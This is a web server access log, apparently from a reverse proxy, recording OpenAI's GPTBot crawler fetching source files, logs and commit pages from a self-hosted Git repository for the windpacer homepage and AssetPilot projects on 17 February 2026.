"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets" -[17/Feb/2026:14:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" -[17/Feb/2026:14:07:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" -[17/Feb/2026:14:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" -[17/Feb/2026:14:07:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11208] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" -[17/Feb/2026:14:07:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/daily" [Client 74.7.227.38] [Length 8384] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:14:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/daily" [Client 74.7.227.38] [Length 8584] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:14:07:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11448] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:07:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9506] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:14:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14640] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:07:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11475] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:14:07:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/monthly" [Client 74.7.227.38] [Length 8600] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" -[17/Feb/2026:14:07:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 288808] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" -[17/Feb/2026:14:07:23 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/pages/DCS.html" -[17/Feb/2026:14:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:14:07:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14912] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:14:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14917] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:14:07:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot.atom" [Client 74.7.227.38] [Length 8270] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" -[17/Feb/2026:14:07:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10869] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" -[17/Feb/2026:14:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27610] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:14:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27641] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:14:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:14:07:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/projects" [Client 74.7.227.38] [Length 7771] [Gzip 2.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" -[17/Feb/2026:14:07:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 12333] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:14:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" -[17/Feb/2026:14:07:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" -[17/Feb/2026:14:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15261] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" -[17/Feb/2026:14:07:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/start.sh" -[17/Feb/2026:14:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" -[17/Feb/2026:14:07:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 15259] [Gzip 8.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" -[17/Feb/2026:14:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32569] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" -[17/Feb/2026:14:07:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32540] [Gzip 11.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" -[17/Feb/2026:14:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 26054] [Gzip 10.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:14:07:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static/js" [Client 74.7.227.38] [Length 10008] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/static" -[17/Feb/2026:14:07:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 14070] [Gzip 6.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/models.py" -[17/Feb/2026:14:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 13086] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app" -[17/Feb/2026:14:07:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" -[17/Feb/2026:14:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 11672] [Gzip 4.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:07:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" [Client 74.7.227.38] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/database.py" -[17/Feb/2026:14:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12173] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:14:07:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.gitignore" [Client 74.7.227.38] [Length 12202] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" -[17/Feb/2026:14:07:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/" -[17/Feb/2026:14:07:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10845] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10844] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:07:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" -[17/Feb/2026:14:07:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" [Client 74.7.227.38] [Length 12866] [Gzip 6.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" -[17/Feb/2026:14:07:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 74.7.227.38] [Length 242891] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 